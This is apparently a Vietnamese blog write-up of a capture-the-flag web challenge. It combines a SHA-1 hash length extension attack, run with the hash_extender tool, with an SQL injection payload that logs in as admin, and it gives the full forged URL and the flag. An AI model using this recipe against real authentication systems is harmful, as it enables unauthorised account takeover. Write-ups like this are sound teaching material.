Mở source file index.php lên thấy được sha1(SECRET.$username.$password) liên tưởng đến hash length extension attack . dùng tool hash extender https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks
Cách sử dụng :
./hash_extender --data ad --secret 6 --append "a' or username='admin' ;-- " --signature aa4bf6af244326aacfe262b729ecf10bdd54d823 --format sha1 --out-data-format=html
Ra được kết quả :
ad%80%40a%27+or+username%3d%27admin%27+%3b%2d%2d++
sau đó inject url như sau:
http://challenges.wargame.vn/200-cryptowww_76778cd364f076d2a875071a9b7a559a/?user=a&pass=d&HASH=c081c4ee58f68f0ff9991a3b2f48c978f3116791%26user%3Dad%2580%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%25b0a%26pass%3D%2527%2Bor%2Busername%253d%2527admin%2527%2B%253b%252d%252d%2B%2B
Hash=<new_hash>&user=<new_string_generate_from_hash_extender>&pass=<inject_code>
Encode nội dung hash de bypass qua :
$API_URL = sprintf('http://localhost/200-cryptoftw_76778cd364f076d2a875071a9b7a559a/api.php?user=%s&pass=%s&HASH=%s',$username,$password,$HASH);
Flag tìm được là: 0x3004{www_mix_crypto_ftw}
Nguyễn Hữu Thọ
HST
Đăng ký:
Đăng Nhận xét (Atom)
0 nhận xét:
Đăng nhận xét